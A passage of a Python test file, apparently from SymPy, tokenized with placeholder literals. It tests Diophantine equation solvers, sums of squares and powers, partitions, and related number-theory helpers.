<NUM_LIT:3> ) ] ) <EOL> eq = u ** <NUM_LIT:2> + v ** <NUM_LIT:2> + x ** <NUM_LIT:2> + y ** <NUM_LIT:2> + z ** <NUM_LIT:2> - <NUM_LIT> <EOL> assert len ( diop_general_sum_of_squares ( eq , <NUM_LIT:3> ) ) == <NUM_LIT:3> <EOL> var = symbols ( '<STR_LIT>' ) + ( symbols ( '<STR_LIT>' , negative = True ) , ) <EOL> eq 
= Add ( * [ i ** <NUM_LIT:2> for i in var ] ) - <NUM_LIT> <EOL> assert diophantine ( eq ) == set ( <EOL> [ ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:5> , <NUM_LIT:6> , - <NUM_LIT:7> ) , ( <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:6> , - <NUM_LIT:8> ) , ( <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:4> , <EOL> <NUM_LIT:5> , - <NUM_LIT:7> ) , ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:3> , - <NUM_LIT:10> ) , ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:4> , <NUM_LIT:4> , <NUM_LIT:4> , - <NUM_LIT:8> ) , ( <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <EOL> <NUM_LIT:3> , <NUM_LIT:5> , - <NUM_LIT:8> ) , ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:7> , - <NUM_LIT:7> ) , ( <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:4> , <NUM_LIT:4> , <NUM_LIT:6> , - <NUM_LIT:6> ) , ( <NUM_LIT:1> , <NUM_LIT:1> , <EOL> <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:6> , - <NUM_LIT:7> ) , ( <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:3> , - <NUM_LIT:9> ) , ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> , - <NUM_LIT:10> ) , ( <NUM_LIT:1> , <EOL> <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , - <NUM_LIT:9> ) , ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:5> , - <NUM_LIT:9> ) , ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT:6> , <NUM_LIT:6> , - <NUM_LIT:6> ) , <EOL> ( <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:5> , - <NUM_LIT:6> ) , ( <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:6> , - <NUM_LIT:8> ) , ( <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:6> , <EOL> - <NUM_LIT:7> ) , ( <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:5> , <NUM_LIT:5> , - <NUM_LIT:7> ) , ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:5> , <NUM_LIT:5> , <NUM_LIT:5> , - <NUM_LIT:6> ) ] ) <EOL> assert diophantine ( <NUM_LIT:12> - x ** <NUM_LIT:2> - y ** <NUM_LIT:2> - z ** <NUM_LIT:2> ) == set ( [ ( <NUM_LIT:2> , <NUM_LIT:2> , 
<NUM_LIT:2> ) ] ) <EOL> eq = a ** <NUM_LIT:2> + b ** <NUM_LIT:2> + c ** <NUM_LIT:2> + d ** <NUM_LIT:2> - <NUM_LIT:4> <EOL> raises ( NotImplementedError , lambda : classify_diop ( - eq ) ) <EOL> def test_diop_partition ( ) : <EOL> for n in [ <NUM_LIT:8> , <NUM_LIT:10> ] : <EOL> for k in range ( <NUM_LIT:1> , <NUM_LIT:8> ) : <EOL> for p in partition ( n , k ) : <EOL> assert len ( p ) == k <EOL> assert [ p for p in partition ( <NUM_LIT:3> , <NUM_LIT:5> ) ] == [ ] <EOL> assert [ list ( p ) for p in partition ( <NUM_LIT:3> , <NUM_LIT:5> , <NUM_LIT:1> ) ] == [ <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:3> ] , [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> ] , [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ] ] <EOL> assert list ( partition ( <NUM_LIT:0> ) ) == [ ( ) ] <EOL> assert list ( partition ( <NUM_LIT:1> , <NUM_LIT:0> ) ) == [ ( ) ] <EOL> assert [ list ( i ) for i in partition ( <NUM_LIT:3> ) ] == [ [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ] , [ <NUM_LIT:1> , <NUM_LIT:2> ] , [ <NUM_LIT:3> ] ] <EOL> def test_prime_as_sum_of_two_squares ( ) : <EOL> for i in [ <NUM_LIT:5> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] : <EOL> a , b = prime_as_sum_of_two_squares ( i ) <EOL> assert a ** <NUM_LIT:2> + b ** <NUM_LIT:2> == i <EOL> assert prime_as_sum_of_two_squares ( <NUM_LIT:7> ) is None <EOL> ans = prime_as_sum_of_two_squares ( <NUM_LIT> ) <EOL> assert ans == ( <NUM_LIT> , <NUM_LIT> ) and type ( ans [ <NUM_LIT:0> ] ) is int <EOL> def test_sum_of_three_squares ( ) : <EOL> for i in [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] : <EOL> a , b , c = sum_of_three_squares ( i ) <EOL> assert a ** <NUM_LIT:2> + b ** <NUM_LIT:2> + c ** <NUM_LIT:2> == i <EOL> assert sum_of_three_squares ( 
<NUM_LIT:7> ) is None <EOL> assert sum_of_three_squares ( ( <NUM_LIT:4> ** <NUM_LIT:5> ) * <NUM_LIT:15> ) is None <EOL> assert sum_of_three_squares ( <NUM_LIT> ) == ( <NUM_LIT:5> , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> assert sum_of_three_squares ( <NUM_LIT:4> ) == ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:2> ) <EOL> def test_sum_of_four_squares ( ) : <EOL> from random import randint <EOL> n = randint ( <NUM_LIT:1> , <NUM_LIT> ) <EOL> assert sum ( i ** <NUM_LIT:2> for i in sum_of_four_squares ( n ) ) == n <EOL> assert sum_of_four_squares ( <NUM_LIT:0> ) == ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> assert sum_of_four_squares ( <NUM_LIT> ) == ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ) <EOL> assert sum_of_four_squares ( <NUM_LIT:15> ) == ( <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ) <EOL> assert sum_of_four_squares ( <NUM_LIT> ) == ( <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:3> ) <EOL> assert sum_of_four_squares ( <NUM_LIT> ) == ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:3> ) <EOL> assert sum_of_four_squares ( <NUM_LIT> ) == ( <NUM_LIT:0> , <NUM_LIT:4> , <NUM_LIT:4> , <NUM_LIT:4> ) <EOL> def test_power_representation ( ) : <EOL> tests = [ ( <NUM_LIT> , <NUM_LIT:3> , <NUM_LIT:2> ) , ( <NUM_LIT> , <NUM_LIT:2> , <NUM_LIT:4> ) , ( <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:2> ) , ( <NUM_LIT:3> , <NUM_LIT:1> , <NUM_LIT:3> ) , ( <NUM_LIT:5> , <NUM_LIT:2> , <NUM_LIT:2> ) , ( <NUM_LIT> , <NUM_LIT:2> , <NUM_LIT:4> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:2> , <NUM_LIT:3> ) ] <EOL> for test in tests : <EOL> n , p , k = test <EOL> f = power_representation ( n , p , k ) <EOL> while True : <EOL> try : <EOL> l = next ( f ) <EOL> assert len ( l ) == k <EOL> chk_sum = <NUM_LIT:0> <EOL> for l_i in l : <EOL> chk_sum = chk_sum + l_i ** p <EOL> assert chk_sum == n <EOL> except StopIteration : <EOL> break <EOL> assert list ( power_representation ( <NUM_LIT:20> , <NUM_LIT:2> , <NUM_LIT:4> , True ) ) == [ ( <NUM_LIT:1> , <NUM_LIT:1> , 
<NUM_LIT:3> , <NUM_LIT:3> ) , ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT:4> ) ] <EOL> raises ( ValueError , lambda : list ( power_representation ( <NUM_LIT> , <NUM_LIT:2> , <NUM_LIT:2> ) ) ) <EOL> raises ( ValueError , lambda : list ( power_representation ( <NUM_LIT:2> , <NUM_LIT:0> , <NUM_LIT:2> ) ) ) <EOL> raises ( ValueError , lambda : list ( power_representation ( <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:0> ) ) ) <EOL> assert list ( power_representation ( - <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:2> ) ) == [ ] <EOL> assert list ( power_representation ( <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ) ) == [ ( <NUM_LIT:1> , ) ] <EOL> assert list ( power_representation ( <NUM_LIT:3> , <NUM_LIT:2> , <NUM_LIT:1> ) ) == [ ] <EOL> assert list ( power_representation ( <NUM_LIT:4> , <NUM_LIT:2> , <NUM_LIT:1> ) ) == [ ( <NUM_LIT:2> , ) ] <EOL> assert list ( power_representation ( <NUM_LIT:3> ** <NUM_LIT:4> , <NUM_LIT:4> , <NUM_LIT:6> , zeros = True ) ) == [ ( <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> ) , ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:3> ) ] <EOL> assert list ( power_representation ( <NUM_LIT:3> ** <NUM_LIT:4> , <NUM_LIT:4> , <NUM_LIT:5> , zeros = False ) ) == [ ] <EOL> assert list ( power_representation ( - <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:2> ) ) == [ ( - <NUM_LIT:1> , - <NUM_LIT:1> ) ] <EOL> assert list ( power_representation ( - <NUM_LIT:2> , <NUM_LIT:4> , <NUM_LIT:2> ) ) == [ ] <EOL> assert list ( power_representation ( <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:2> , True ) ) == [ ( <NUM_LIT:0> , <NUM_LIT:0> ) ] <EOL> assert list ( power_representation ( <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:2> , False ) ) == [ ] <EOL> assert len ( list ( power_representation ( <NUM_LIT:4> ** <NUM_LIT:10> * ( <NUM_LIT:8> * <NUM_LIT:10> + <NUM_LIT:7> ) , <NUM_LIT:2> , <NUM_LIT:3> ) ) ) == <NUM_LIT:0> <EOL> big = <NUM_LIT:2> ** <NUM_LIT:30> <EOL> for i in [ <NUM_LIT> , <NUM_LIT:10> , <NUM_LIT:7> , 
<NUM_LIT:5> , <NUM_LIT:4> , <NUM_LIT:2> , <NUM_LIT:1> ] : <EOL> assert list ( sum_of_powers ( big , <NUM_LIT:2> , big - i ) ) == [ ] <EOL> def test_assumptions ( ) : <EOL> """<STR_LIT>""" <EOL> m , n = symbols ( '<STR_LIT>' , integer = True , positive = True ) <EOL> diof = diophantine ( n ** <NUM_LIT:2> + m * n - <NUM_LIT> ) <EOL> assert diof == set ( [ ( <NUM_LIT:5> , <NUM_LIT:20> ) , ( <NUM_LIT> , <NUM_LIT:10> ) , ( <NUM_LIT> , <NUM_LIT:5> ) , ( <NUM_LIT> , <NUM_LIT:4> ) , ( <NUM_LIT> , <NUM_LIT:2> ) , ( <NUM_LIT> , <NUM_LIT:1> ) ] ) <EOL> a , b = symbols ( '<STR_LIT>' , integer = True , positive = False ) <EOL> diof = diophantine ( a * b + <NUM_LIT:2> * a + <NUM_LIT:3> * b - <NUM_LIT:6> ) <EOL> assert diof == set ( [ ( - <NUM_LIT:15> , - <NUM_LIT:3> ) , ( - <NUM_LIT:9> , - <NUM_LIT:4> ) , ( - <NUM_LIT:7> , - <NUM_LIT:5> ) , ( - <NUM_LIT:6> , - <NUM_LIT:6> ) , ( - <NUM_LIT:5> , - <NUM_LIT:8> ) , ( - <NUM_LIT:4> , - <NUM_LIT> ) ] ) <EOL> def check_solutions ( eq ) : <EOL> """<STR_LIT>""" <EOL> s = diophantine ( eq ) <EOL> factors = Mul . make_args ( eq ) <EOL> var = list ( eq . free_symbols ) <EOL> var . sort ( key = default_sort_key ) <EOL> while s : <EOL> solution = s . pop ( ) <EOL> for f in factors : <EOL> if diop_simplify ( f . 
subs ( zip ( var , solution ) ) ) == <NUM_LIT:0> : <EOL> break <EOL> else : <EOL> return False <EOL> return True <EOL> def test_diopcoverage ( ) : <EOL> eq = ( <NUM_LIT:2> * x + y + <NUM_LIT:1> ) ** <NUM_LIT:2> <EOL> assert diop_solve ( eq ) == set ( [ ( t_0 , - <NUM_LIT:2> * t_0 - <NUM_LIT:1> ) ] ) <EOL> eq = <NUM_LIT:2> * x ** <NUM_LIT:2> + <NUM_LIT:6> * x * y + <NUM_LIT:12> * x + <NUM_LIT:4> * y ** <NUM_LIT:2> + <NUM_LIT> * y + <NUM_LIT> <EOL> assert diop_solve ( eq ) == set ( [ ( t_0 , - t_0 - <NUM_LIT:3> ) , ( <NUM_LIT:2> * t_0 - <NUM_LIT:3> , - t_0 ) ] ) <EOL> assert diop_quadratic ( x + y ** <NUM_LIT:2> - <NUM_LIT:3> ) == set ( [ ( - t ** <NUM_LIT:2> + <NUM_LIT:3> , - t ) ] ) <EOL> assert diop_linear ( x + y - <NUM_LIT:3> ) == ( t_0 , <NUM_LIT:3> - t_0 ) <EOL> assert base_solution_linear ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , t = None ) == ( <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> ans = ( <NUM_LIT:3> * t - <NUM_LIT:1> , - <NUM_LIT:2> * t + <NUM_LIT:1> ) <EOL> assert base_solution_linear ( <NUM_LIT:4> , <NUM_LIT:8> , <NUM_LIT:12> , t ) == ans <EOL> assert base_solution_linear ( <NUM_LIT:4> , <NUM_LIT:8> , <NUM_LIT:12> , t = None ) == tuple ( _ . 
subs ( t , <NUM_LIT:0> ) for _ in ans ) <EOL> assert cornacchia ( <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:20> ) is None <EOL> assert cornacchia ( <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:5> ) == set ( [ ( <NUM_LIT:1> , <NUM_LIT:2> ) ] ) <EOL> assert cornacchia ( <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT> ) == set ( [ ( <NUM_LIT:3> , <NUM_LIT:2> ) ] ) <EOL> raises ( ValueError , lambda : reconstruct ( <NUM_LIT:4> , <NUM_LIT:20> , <NUM_LIT:1> ) ) <EOL> assert gaussian_reduce ( <NUM_LIT:4> , <NUM_LIT:1> , <NUM_LIT:3> ) == ( <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> eq = - w ** <NUM_LIT:2> - x ** <NUM_LIT:2> - y ** <NUM_LIT:2> + z ** <NUM_LIT:2> <EOL> assert diop_general_pythagorean ( eq ) == diop_general_pythagorean ( - eq ) == ( m1 ** <NUM_LIT:2> + m2 ** <NUM_LIT:2> - m3 ** <NUM_LIT:2> , <NUM_LIT:2> * m1 * m3 , <EOL> <NUM_LIT:2> * m2 * m3 , m1 ** <NUM_LIT:2> + m2 ** <NUM_LIT:2> + m3 ** <NUM_LIT:2> ) <EOL> assert check_param ( S ( <NUM_LIT:3> ) + x / <NUM_LIT:3> , S ( <NUM_LIT:4> ) + x / <NUM_LIT:2> , S ( <NUM_LIT:2> ) , x ) == ( None , None ) <EOL> assert check_param ( S ( <NUM_LIT:3> ) / <NUM_LIT:2> , S ( <NUM_LIT:4> ) + x , S ( <NUM_LIT:2> ) , x ) == ( None , None ) <EOL> assert check_param ( S ( <NUM_LIT:4> ) + x , S ( <NUM_LIT:3> ) / <NUM_LIT:2> , S ( <NUM_LIT:2> ) , x ) == ( None , None ) <EOL> assert _nint_or_floor ( <NUM_LIT:16> , <NUM_LIT:10> ) == <NUM_LIT:2> <EOL> assert _odd ( <NUM_LIT:1> ) == ( not _even ( <NUM_LIT:1> ) ) == True <EOL> assert _odd ( <NUM_LIT:0> ) == ( not _even ( <NUM_LIT:0> ) ) == False <EOL> assert _remove_gcd ( <NUM_LIT:2> , <NUM_LIT:4> , <NUM_LIT:6> ) == ( <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ) <EOL> raises ( TypeError , lambda : _remove_gcd ( ( <NUM_LIT:2> , <NUM_LIT:4> , <NUM_LIT:6> ) ) ) <EOL> assert sqf_normal ( <NUM_LIT:2> * <NUM_LIT:3> ** <NUM_LIT:2> * <NUM_LIT:5> , <NUM_LIT:2> * <NUM_LIT:5> * <NUM_LIT:11> , <NUM_LIT:2> * <NUM_LIT:7> ** <NUM_LIT:2> * <NUM_LIT:11> ) == ( <NUM_LIT:11> , <NUM_LIT:1> , <NUM_LIT:5> ) <EOL> raises ( NotImplementedError 
, lambda : diophantine ( x ** <NUM_LIT:2> + y ** <NUM_LIT:2> + x * y + <NUM_LIT:2> * y * z - <NUM_LIT:12> ) ) <EOL> raises ( NotImplementedError , lambda : diophantine ( x ** <NUM_LIT:3> + y ** <NUM_LIT:2> ) ) <EOL> def test_holzer ( ) : <EOL> assert holzer ( <NUM_LIT:2> , <NUM_LIT:7> , <NUM_LIT> , <NUM_LIT:4> , <NUM_LIT> , <NUM_LIT> ) == ( <NUM_LIT:2> , <NUM_LIT:7> , <NUM_LIT> ) <EOL> assert holzer ( <NUM_LIT:2> , <NUM_LIT:6> , <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:10> ) == ( <NUM_LIT:2> , <NUM_LIT:6> , <NUM_LIT:2> ) <EOL> raises ( ValueError , lambda : holzer ( <NUM_LIT:2> , <NUM_LIT:7> , <NUM_LIT> , <NUM_LIT:4> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> @ XFAIL <EOL> def test_fail_holzer ( ) : <EOL> eq = lambda x , y , z : a * x ** <NUM_LIT:2> + b * y ** <NUM_LIT:2> - c * z ** <NUM_LIT:2> <EOL> a , b , c = <NUM_LIT:4> , <NUM_LIT> , <NUM_LIT> <EOL> x , y , z = xyz = <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT:11> <EOL> X , Y , Z = ans = <NUM_LIT:2> , <NUM_LIT:7> , <NUM_LIT> <EOL> assert eq ( * xyz ) == <NUM_LIT:0> <EOL> assert eq ( * ans ) == <NUM_LIT:0> <EOL> assert max ( a * x ** <NUM_LIT:2> , b * y ** <NUM_LIT:2> , c * z ** <NUM_LIT:2> ) <= a * b * c <EOL> assert max ( a * X ** <NUM_LIT:2> , b * Y ** <NUM_LIT:2> , c * Z ** <NUM_LIT:2> ) <= a * b * c <EOL> h = holzer ( x , y , z , a , b , c ) <EOL> assert h == ans <EOL> def test_issue_9539 ( ) : <EOL> assert diophantine ( <NUM_LIT:6> * w + <NUM_LIT:9> * y + <NUM_LIT:20> * x - z ) == set ( [ ( t_0 , t_1 , t_1 + t_2 , <NUM_LIT:6> * t_0 + <NUM_LIT> * t_1 + <NUM_LIT:9> * t_2 ) ] ) <EOL> def test_issue_8943 ( ) : <EOL> assert diophantine ( <EOL> ( <NUM_LIT:3> * ( x ** <NUM_LIT:2> + y ** <NUM_LIT:2> + z ** <NUM_LIT:2> ) - <NUM_LIT> * ( x * y + y * z + z * x ) ) ) == set ( [ ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ) ] ) <EOL> def test_diop_sum_of_even_powers ( ) : <EOL> eq = x ** <NUM_LIT:4> + y ** <NUM_LIT:4> + z ** <NUM_LIT:4> - <NUM_LIT> <EOL> assert diop_solve ( eq ) == set ( [ ( <NUM_LIT:3> , <NUM_LIT:6> , 
<NUM_LIT:6> ) , ( <NUM_LIT:2> , <NUM_LIT:4> , <NUM_LIT:7> ) ] ) <EOL> assert diop_general_sum_of_even_powers ( eq , <NUM_LIT:2> ) == set ( <EOL> [ ( <NUM_LIT:3> , <NUM_LIT:6> , <NUM_LIT:6> ) , ( <NUM_LIT:2> , <NUM_LIT:4> , <NUM_LIT:7> ) ] ) <EOL> raises ( NotImplementedError , lambda : diop_general_sum_of_even_powers ( - eq , <NUM_LIT:2> ) ) <EOL> neg = symbols ( '<STR_LIT>' , negative = True ) <EOL> eq = x ** <NUM_LIT:4> + y ** <NUM_LIT:4> + neg ** <NUM_LIT:4> - <NUM_LIT> <EOL> assert diop_general_sum_of_even_powers ( eq ) == set ( [ ( - <NUM_LIT:2> , <NUM_LIT:4> , <NUM_LIT:7> ) ] ) <EOL> assert diophantine ( x ** <NUM_LIT:4> + y ** <NUM_LIT:4> + <NUM_LIT:2> ) == set ( ) <EOL> assert diop_general_sum_of_even_powers ( x ** <NUM_LIT:4> + y ** <NUM_LIT:4> - <NUM_LIT:2> , limit = <NUM_LIT:0> ) == set ( ) <EOL> def test_sum_of_squares_powers ( ) : <EOL> tru = set ( [ <EOL> ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:11> ) , ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:5> , <NUM_LIT:7> , <NUM_LIT:7> ) , ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:7> , <NUM_LIT:8> ) , ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:9> ) , <EOL> ( <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:7> , <NUM_LIT:7> ) , ( <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:5> , <NUM_LIT:5> , <NUM_LIT:8> ) , ( <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:6> , <NUM_LIT:9> ) , ( <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:6> , <NUM_LIT:6> , <NUM_LIT:7> ) , <EOL> ( <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:10> ) , ( <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:4> , <NUM_LIT:9> ) , ( <NUM_LIT:1> , <NUM_LIT:5> , <NUM_LIT:5> , <NUM_LIT:6> , <NUM_LIT:6> ) , ( <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:5> , <NUM_LIT:9> ) , <EOL> ( <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:5> , <NUM_LIT:6> , <NUM_LIT:7> ) , ( <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:8> ) ] ) <EOL> eq = u ** <NUM_LIT:2> + v ** <NUM_LIT:2> + x ** 
<NUM_LIT:2> + y ** <NUM_LIT:2> + z ** <NUM_LIT:2> - <NUM_LIT> <EOL> ans = diop_general_sum_of_squares ( eq , oo ) <EOL> assert len ( ans ) == <NUM_LIT> <EOL> raises ( ValueError , lambda : list ( sum_of_squares ( <NUM_LIT:10> , - <NUM_LIT:1> ) ) ) <EOL> assert list ( sum_of_squares ( - <NUM_LIT:10> , <NUM_LIT:2> ) ) == [ ] <EOL> assert list ( sum_of_squares ( <NUM_LIT:2> , <NUM_LIT:3> ) ) == [ ] <EOL> assert list ( sum_of_squares ( <NUM_LIT:0> , <NUM_LIT:3> , True ) ) == [ ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ) ] <EOL> assert list ( sum_of_squares ( <NUM_LIT:0> , <NUM_LIT:3> ) ) == [ ] <EOL> assert list ( sum_of_squares ( <NUM_LIT:4> , <NUM_LIT:1> ) ) == [ ( <NUM_LIT:2> , ) ] <EOL> assert list ( sum_of_squares ( <NUM_LIT:5> , <NUM_LIT:1> ) ) == [ ] <EOL> assert list ( sum_of_squares ( <NUM_LIT:50> , <NUM_LIT:2> ) ) == [ ( <NUM_LIT:1> , <NUM_LIT:7> ) , ( <NUM_LIT:5> , <NUM_LIT:5> ) ] <EOL> assert list ( sum_of_squares ( <NUM_LIT:11> , <NUM_LIT:5> , True ) ) == [ <EOL> ( <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:2> ) , ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:3> ) ] <EOL> assert list ( sum_of_squares ( <NUM_LIT:8> , <NUM_LIT:8> ) ) == [ ( <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ) ] <EOL> assert [ len ( list ( sum_of_squares ( i , <NUM_LIT:5> , True ) ) ) for i in range ( <NUM_LIT:30> ) ] == [ <EOL> <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:2> , <EOL> <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:2> , <EOL> <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:2> , <EOL> <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:3> , <EOL> <NUM_LIT:4> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:2> , <NUM_LIT:2> , <EOL> <NUM_LIT:4> , <NUM_LIT:4> , <NUM_LIT:4> , <NUM_LIT:4> , <NUM_LIT:5> ] <EOL> assert [ len ( list ( sum_of_squares ( i , <NUM_LIT:5> ) ) ) for i in range ( <NUM_LIT:30> ) ] == [ 
<EOL> <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <EOL> <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <EOL> <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> , <EOL> <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , <EOL> <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <EOL> <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:3> ] <EOL> for i in range ( <NUM_LIT:30> ) : <EOL> s1 = set ( sum_of_squares ( i , <NUM_LIT:5> , True ) ) <EOL> assert not s1 or all ( sum ( j ** <NUM_LIT:2> for j in t ) == i for t in s1 ) <EOL> s2 = set ( sum_of_squares ( i , <NUM_LIT:5> ) ) <EOL> assert all ( sum ( j ** <NUM_LIT:2> for j in t ) == i for t in s2 ) <EOL> raises ( ValueError , lambda : list ( sum_of_powers ( <NUM_LIT:2> , - <NUM_LIT:1> , <NUM_LIT:1> ) ) ) <EOL> raises ( ValueError , lambda : list ( sum_of_powers ( <NUM_LIT:2> , <NUM_LIT:1> , - <NUM_LIT:1> ) ) ) <EOL> assert list ( sum_of_powers ( - <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:2> ) ) == [ ( - <NUM_LIT:1> , - <NUM_LIT:1> ) ] <EOL> assert list ( sum_of_powers ( - <NUM_LIT:2> , <NUM_LIT:4> , <NUM_LIT:2> ) ) == [ ] <EOL> assert list ( sum_of_powers ( <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:1> ) ) == [ ( <NUM_LIT:2> , ) ] <EOL> assert list ( sum_of_powers ( <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:3> , True ) ) == [ ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:2> ) , ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> ) ] <EOL> assert list ( sum_of_powers ( <NUM_LIT:5> , <NUM_LIT:1> , <NUM_LIT:2> , True ) ) == [ ( <NUM_LIT:0> , <NUM_LIT:5> ) , ( <NUM_LIT:1> , <NUM_LIT:4> ) , ( <NUM_LIT:2> , <NUM_LIT:3> ) ] <EOL> assert list ( sum_of_powers ( <NUM_LIT:6> , <NUM_LIT:2> , <NUM_LIT:2> ) ) == [ ] 